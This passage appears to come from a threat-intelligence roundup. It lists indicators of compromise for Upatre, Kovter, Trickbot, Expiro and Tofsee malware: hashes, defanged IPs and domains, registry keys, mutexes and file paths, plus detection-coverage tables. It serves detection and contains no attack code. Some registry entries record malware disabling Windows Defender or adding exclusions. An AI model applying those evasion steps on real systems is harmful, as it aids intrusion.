a11b566c7bd562cb4cdee2c1bc92313a11ebdacf4fdde58c224eb7eac0e6faf1 bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb c1c1165edb4b0853d6433961aec1b54982fe3273a094d53bb1b2f23e9f6713de ca13c5fb577c3a218a3be31c59145137e11b4c7188839b7962a3ce3e7d6277ec d66d2ea9744ca077c3dc76c303a284c1d2b863151931ddcce656fb35a52289e6 e4f5f19e945a41ad8f0ec7e9c35b23ea039a5a2bdaaf8e42a78c8f86b231334e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-WE_0-l9xsRY/XbMTGgbn3yI/AAAAAAAAC08/PF7db_lZj3IaYc5hrsljMrxhSQY2JA5JACLcBGAsYHQ/s1600/bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-MDzTnqb5kkw/XbMTJwxP1JI/AAAAAAAAC1A/hpqhzB9wiRkO5YlIR5EknRTVx2VEto5EQCLcBGAsYHQ/s1600/bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Upatre-7355650-0\n\n#### Indicators of Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`83[.]136[.]254[.]57` | 8 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`cardiffpower[.]com` | 8 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\hcbnaf.exe` | 18 \n`%TEMP%\\hgnddkje.exe` | 17 \n \n#### File Hashes\n\n` 0001e614c453604df0274956181e30350b7d6b1b91a169efdcbfee9a14a17626 01cd20d9212c000b7d8d97c47029b1b487050ead1b65e1c9c34e475f0f178add 055c1293bfc73671ac423aca35488dc3ec7510523695b8bf50d2f52e625680b7 1abc3b0481dc17e7aa7176b87605503b0baa9e340b4c5e673597fd06725f72f8 1f1db1372645d08bf117d2154ef9f67a2163295900b6311e4cd2268669601c1c 27e9f49d26c1202470242da4fe53199b74f525ee13bee5b34b1d613f2d5f2983 4200aca5bfb24f7b02cbcd39c7d6f4c773ed34eec17ac11ad9d5cee5aaba1940 669b62caaa55cf04de326355b319e16f481092c8098b418f9f2b09051b5e9088 8412bf5346bedec07e58c31bd15ddd98d31e8686c9f870444b2bbd1c8b527cb7 9476469b243db70017ef61c6da483e516516380136a4799015a4ef056e9f1742 9fe8e8a4818e3d63741c4c21ebb9e240d1a26573614162c0b313246b387ef13d a9d192a121401a7bb63b4fb403f346153090f239ff0761d2f12d12b7bc49741f bcecb26d7f81aa151a5d2f74f91029a6b1160bc02f431b3c617971ecdeb9e79b e0b5ae5ad859b17ee532cb274f952ee18254fe941b3d8a129fddda85c65225fb f480866abfdfd00f7c4a383f1acc9cdd01915d67fed1db367e8dd1cb41171983 f4968453af8a196794abe13cca1747da16b15850c99428778c9a1f6609ca22db fbd5dcf3f1a93947cb72d9b9d48189810c630d32e94b6f2bbb1811a349e1fb00 fc51c46b56c0a23b400789cd2408a8e8f0204ebb544a410298578c277227cea9 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-5MK_onxmsMg/XbMTvl3A0sI/AAAAAAAAC1Q/gRy_kxL2IkIu_yBoasybIt95BdGrmjmJgCLcBGAsYHQ/s1600/055c1293bfc73671ac423aca35488dc3ec7510523695b8bf50d2f52e625680b7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NNRa5QrtV38/XbMT0YUs6PI/AAAAAAAAC1U/ViBmNEJ3xSU2PgWdqR3p9W5-LFExBEKIwCLcBGAsYHQ/s1600/4200aca5bfb24f7b02cbcd39c7d6f4c773ed34eec17ac11ad9d5cee5aaba1940_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Hl00DmZo4z0/XbMT6a04q6I/AAAAAAAAC1Y/npMrmH8bx70pm-DzeEFwmFAnz1u2gFEQgCLcBGAsYHQ/s1600/2eb229efaa5a043263e6546583c811738d5695a8afbb035f3c76fe80929c18eb_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7352197-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: iexplore.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: iexplore.exe ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: regsvr32.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\INTERNET EXPLORER\\MAIN\\FEATURECONTROL\\FEATURE_BROWSER_EMULATION \nValue Name: regsvr32.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: ab87b5d3 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: ab87b5d3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 626beb1a ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 626beb1a ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 52e3fdae ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 52e3fdae ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 13faecd5 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 13faecd5 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 214fab25 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 214fab25 ` | 25 \n`<HKCU>\\SOFTWARE\\3E7DC3D9A3 \nValue Name: 89d39e9a ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3E7DC3D9A3 \nValue Name: 89d39e9a ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3f88794a ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: f50e45da ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3f88794a ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 25 \nMutexes | Occurrences \n---|--- \n`4C2A424BDFE77F08` | 25 \n`Global\\377DB1FA5041B00C` | 25 \n`2CAEEF5D79FF2C96` | 25 \n`5F02253DDD3215C1` | 25 \n`0F8579C06C8A73E7` | 15 \n`Global\\148FEA91D04ADF73` | 15 \n`35A61B8070E50AA3` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`82[.]21[.]65[.]83` | 1 \n`166[.]141[.]185[.]163` | 1 \n`93[.]229[.]231[.]137` | 1 \n`142[.]250[.]246[.]73` | 1 \n`159[.]182[.]203[.]131` | 1 \n`63[.]121[.]210[.]194` | 1 \n`42[.]97[.]167[.]153` | 1 \n`113[.]179[.]182[.]225` | 1 \n`156[.]34[.]80[.]75` | 1 \n`218[.]64[.]159[.]231` | 1 \n`182[.]94[.]255[.]58` | 1 \n`84[.]226[.]162[.]67` | 1 \n`212[.]123[.]72[.]164` | 1 \n`183[.]74[.]168[.]214` | 1 \n`20[.]118[.]2[.]20` | 1 \n`168[.]141[.]179[.]181` | 1 \n`114[.]97[.]61[.]121` | 1 \n`201[.]32[.]115[.]236` | 1 \n`108[.]124[.]8[.]164` | 1 \n`212[.]246[.]227[.]79` | 1 \n`68[.]6[.]254[.]161` | 1 \n`159[.]133[.]144[.]196` | 1 \n`16[.]215[.]96[.]194` | 1 \n`189[.]183[.]233[.]195` | 1 \n`60[.]194[.]81[.]71` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]cloudflare[.]com` | 2 \n`cpanel[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`cp[.]aliyun[.]com` | 1 \n`netcn[.]console[.]aliyun[.]com` | 1 \n`bugs[.]launchpad[.]net` | 1 \n`manpages[.]debian[.]org` | 1 \n`files[.]ofile[.]com` | 1 \n`www[.]zerodistance[.]fi` | 1 \n \n#### File Hashes\n\n` 015d420249c90969fc15bd3c81839c05242c68e42135bc6e04743f16c3db8247 119e68e1ed3d764e9ccedbffb4e2adc1522b9a9c4672c8a52c70d3b75af919f1 19595e9e80a2da27c682814726e373d7207e6681b9a4b96a5744736976342f46 1fc7d5d27d4817cacae040833970a636a41a6cfe9fa783de92cdad2e93a620ac 21f75f1a46cc68cde8bc7cc10d63bca95a561268ad49d943afc8ca177cc89184 26555d26c4afce1e035031d293aab4acdb12a77530b375421be6e0bb80742057 41ce8bc25ec1a3bf85e346656cdfdcd1eaa4070c3783d133f25ffcebf55bb6d8 423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a 533b055f7be13fe6c40eb49bebf93901b22ea3ada9babf100675c7ca53cd0c03 605ea58c8282dc5ef581f31b24647d463562d646a5be2004a174773416ec106c 6181608294d3482931e3a65f1e7c63182327076506e1c7c51583b57ef115d8ed 69ba2b3868404234ead2f364cbbfd1a13af9da0fbfa77845a09e06525f3c107f 72e70aa9877033cdf9c6d77f767545cd1365f7034a4da22c823eea4d60eb1bee 76d567e13a7cb9d97682944975accbeb0c4f3f6858ab84f64af849c4d5df25bb 8136ceed3bc05c0ebe9b0ac8bb9c9925eb781f6fa4a994c976f3ff24f692e962 91f71c8b5385d7441e2f8b82ce5be7f17a9c9fddd431c45dafab309d2fd76145 9218ea373d7322c49a3248b94b13366499f23d30b1f17ea63c3c19fe788376a6 97603c7315e26964dd15bdfb9a5932340271a949352364ebcb694282dd282ed1 9e7ce5f193afa02fc3165a34366981a34a1685deaf2b249f4fb089c8a25e77fd a318a5c36defbd74a7ad1ef3cca3670dadb918d692ce1e97c62b8022bb5a7ee6 c36a861e05aac4fa885836f60b871cc116085e05351d8a1a586db85dc902786f d0120bc8873d60781fd8a0640ce9d37a2f8daefc90747196ba70f4e7b5af41c1 d1fe8fea741f9758292df1b335ed203c4f9f6ec462690dd7338f043a01ffae8c d89115020458a087bb71f7f338e8b5cc9182c98d6559cf0573c5a87304fdd65b dfe7a1d91600e7bde92d16deb4a3bee5da7c01391d55f3e03c57e817d7bff7c6 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-zaAbJCVallA/XbMVTdEoonI/AAAAAAAAC1s/cey-CAka8WobFk98jUOtCE7HFMAoOxDsgCLcBGAsYHQ/s1600/423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qS_zecVWJxI/XbMVYEMg2nI/AAAAAAAAC1w/V5lxMAi6DuQbwgmFw5TNxvUNFBLXvEfKQCLcBGAsYHQ/s1600/423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7352185-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 23 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 23 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 23 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`200[.]122[.]209[.]78` | 8 \n`176[.]119[.]156[.]225` | 6 \n`31[.]202[.]132[.]22` | 5 \n`190[.]0[.]20[.]114` | 3 \n`152[.]89[.]245[.]209` | 3 \n`103[.]122[.]33[.]58` | 2 \n`181[.]143[.]17[.]66` | 2 \n`45[.]160[.]145[.]216` | 2 \n`37[.]44[.]212[.]179` | 2 \n`80[.]173[.]224[.]81` | 1 \n`119[.]92[.]23[.]203` | 1 \n`201[.]184[.]69[.]50` | 1 \n`190[.]109[.]178[.]222` | 1 \n`68[.]186[.]167[.]196` | 1 \n`45[.]160[.]145[.]11` | 1 \n`185[.]255[.]79[.]127` | 1 \n`45[.]160[.]145[.]179` | 1 \n`117[.]204[.]255[.]139` | 1 \n`103[.]87[.]48[.]37` | 1 \n`195[.]123[.]237[.]155` | 1 \n`190[.]109[.]169[.]49` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\browser\\settings.ini` | 23 \n`%APPDATA%\\browser` | 23 \n`%System32%\\Tasks\\BrowserStorage` | 23 \n`%APPDATA%\\BROWSER\\<original file name>.exe` | 23 \n \n#### File Hashes\n\n` 0627afe0eb7517208d514c54b83436885eae259fa984bd6dbcfeb788ce5f2b80 0e21da4e3c8dfd077454f417b8b602b281887dbc487cce3e60a508b03ec7a897 2820d3a726768ac98f7357f182fa0f27e63743c025a40025f316a281dbecfe66 4e6f460398ab227ece450409e1343665b73a73f1c330b9ebbb8a03c8c2171f1b 587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e 66b9b21677bfbb131aaab959f603091db4ce740a92c2376d84df43343b2de68d 69b4a369319e0c9c16fee1fe7db6f5ccc20076e4296a000f92f756ef1cb31533 756bf7440aa067883f18db9c567fa11c45aa9a7ee05e86bd2f759a726500d90d 80096a877332490f8e5d303906335e5420e8a95f90109c08596330ab0d77cf8a 843019efa320b08991d64ce99faaa5a254af828f6f8be64715f6e5f3833769be 877f01088ac912f8e7cfffd81b86ba21d8eeaccb5e3f675fd5299efab7e8fc5f 8fc61570c2e05fd746da7e7e14d9558afe38b0f00e6ccf2c43e0fd46247fb8f2 9706de7a46a3a13ba3275aa583ac70b31071a8fb30e3bd1061ceb0c3ea6532fe a5eb7f6a1d253fe60bf02e19a8858fd80dc4a7358f660d84fa85b6f6e011b11e bd26a6bd3d52b26c66f1b3503b0dd901a68318a66caa846d77fde10ad6f9668a c84b91da836a003057d90123e25cbaec576a20d1f98c621d777de47cdfdd40e3 cad65e1ce6ec9e36e8073c79a0a406997ed825e65af3952e55ea9c44c6e39122 ce5393632e1c0adb91af5ffc8a6b486141cb895a3b762b853ebfdb3518563dbf d0e9f2ba27da2bee48617c219a2a5e4b2db9d96b5e19ac16098384c3bb36c65f d54747ba18aec6ee4a9670148fd420dab486992f37df1e577abd9bc4d5dd2eb6 dd5ae9ad15a51845b317b83ba6d0bf2f010b2dfae3c85e7099b95c9bb0ea09a0 f79bac124531d2050d668a510e074930f5c1c9af7997a9513a8f16eb7549a8b7 fc061e1261397c24a7d074a7cac01e74af9f47b6300911f3734104c1557928d8 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-r0rUv1OadjA/XbMWmL1F6ZI/AAAAAAAAC2A/svzZCUcu6QsSkhOt_fd-qJfm5uFDhz8RwCLcBGAsYHQ/s1600/587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qi2ScRtKTqA/XbMW296nkQI/AAAAAAAAC2I/s7dXfc-_ixAnV-Ae-tjEWFafwfVCbDzpQCLcBGAsYHQ/s1600/587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7350682-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\AELOOKUPSVC \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\AELOOKUPSVC \nValue Name: Start ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 16 \nMutexes | Occurrences \n---|--- \n`kkq-vx_mtx1` | 16 \n`gazavat-svc` | 16 \n`kkq-vx_mtx67` | 16 \n`kkq-vx_mtx68` | 16 \n`kkq-vx_mtx69` | 16 \n`kkq-vx_mtx70` | 16 \n`kkq-vx_mtx71` | 16 \n`kkq-vx_mtx72` | 16 \n`kkq-vx_mtx73` | 16 \n`kkq-vx_mtx74` | 16 \n`kkq-vx_mtx75` | 16 \n`kkq-vx_mtx76` | 16 \n`kkq-vx_mtx77` | 16 \n`kkq-vx_mtx78` | 16 \n`kkq-vx_mtx79` | 16 \n`kkq-vx_mtx80` | 16 \n`kkq-vx_mtx81` | 16 \n`kkq-vx_mtx82` | 16 \n`kkq-vx_mtx83` | 16 \n`kkq-vx_mtx84` | 16 \n`kkq-vx_mtx85` | 16 \n`kkq-vx_mtx86` | 16 \n`kkq-vx_mtx87` | 16 \n`kkq-vx_mtx88` | 16 \n`kkq-vx_mtx89` | 16 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe` | 16 \n`%CommonProgramFiles(x86)%\\microsoft shared\\Source Engine\\OSE.EXE` | 16 \n`%ProgramFiles(x86)%\\Microsoft Office\\Office14\\GROOVE.EXE` | 16 \n`%ProgramFiles(x86)%\\Mozilla Maintenance Service\\maintenanceservice.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.log` | 16 \n`%SystemRoot%\\Registration\\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{33EC2C09-9668-4DE7-BCC0-EFC69D7355D7}.crmlog` | 16 \n`%SystemRoot%\\SysWOW64\\dllhost.exe` | 16 \n`%SystemRoot%\\SysWOW64\\msiexec.exe` | 16 \n`%SystemRoot%\\SysWOW64\\svchost.exe` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.vir` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.vir` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.vir` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.vir` | 16 \n`%CommonProgramFiles(x86)%\\microsoft shared\\Source Engine\\ose.vir` | 16 \n`%ProgramFiles(x86)%\\Microsoft Office\\Office14\\groove.vir` | 16 \n`%ProgramFiles(x86)%\\Mozilla Maintenance Service\\maintenanceservice.vir` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.vir` | 16 \n`%SystemRoot%\\SysWOW64\\dllhost.vir` | 16 \n`%SystemRoot%\\SysWOW64\\msiexec.vir` | 16 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\extensions\\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\\chrome.manifest` | 16 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 356d00dc8ff16fb18f68ccf4f622ab551979b6e14fb802a5c7f394038e19b384 40601e6f4ecb0879bf458b2ce1912ca780b723f971a6cf7c0dd900dd97ff024c 598726fe4b882d2510f3d05d60d58627fd9cf7b90d26187c344a5d9e27902588 5fb45cd8e75ac1418c72843ab892622ebcf9b6c744b5373bd79d825ddb202814 6ef92eff4e1fa8f4093880e24a99341fbe6f9365437920f995af24a73c73a71a 701ae8d2647c886f84c538a9846abdc98ebab9adf994143e17b298f7a6158085 7450df6862c201f3954495ee2b9e1f18b699b7a050cfbfe41db2f68c04b46d76 84f35b43d4f36e1135ce90853af4b5ee0bc1b4969740e4abb2551f067027c9ee 86e65f10866176f9b20bfb6b6b793d743576f532e811e638c4a6fa238e17c900 9739ae5c12dce410017a5ca6be2f169e97d23da942eaf85e0f365a33035478a4 9ce9ec31b261d6ecd124f6b5b2b408ae1b17ca78aea5287ea2b93e1ecfb76e8e a3c8e47460067b1733559dbbc2d7245a569e3e4aa67b36c67c74ca7f64511d26 acc76ce4ad9708b1a0562fcf8cc27c1ba06e9cbac781b438bdf6b57bd775d3dd c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25 e35f51fc7fe79189d163f04b9f083bc2f0127b72645045693d864e6d0e4004af f5e1a8f1c48cd0cda719e7da167f91c3e0696f4a259a22b0160763b7aeacf602 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LaqvOO40vjg/XbMXJX1qB7I/AAAAAAAAC2Q/NMrCii_ipxcANoafTA3hZqT3EqN0_5ONgCLcBGAsYHQ/s1600/c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_PlIsPJvDsU/XbMXNIrBrXI/AAAAAAAAC2U/TM5kKFyOyIYs0IhkCv41hxt2Hd1-Yi63wCLcBGAsYHQ/s1600/c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Tofsee-7349716-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\kjsstakc ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jirrszjb ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qpyyzgqi ` | 2 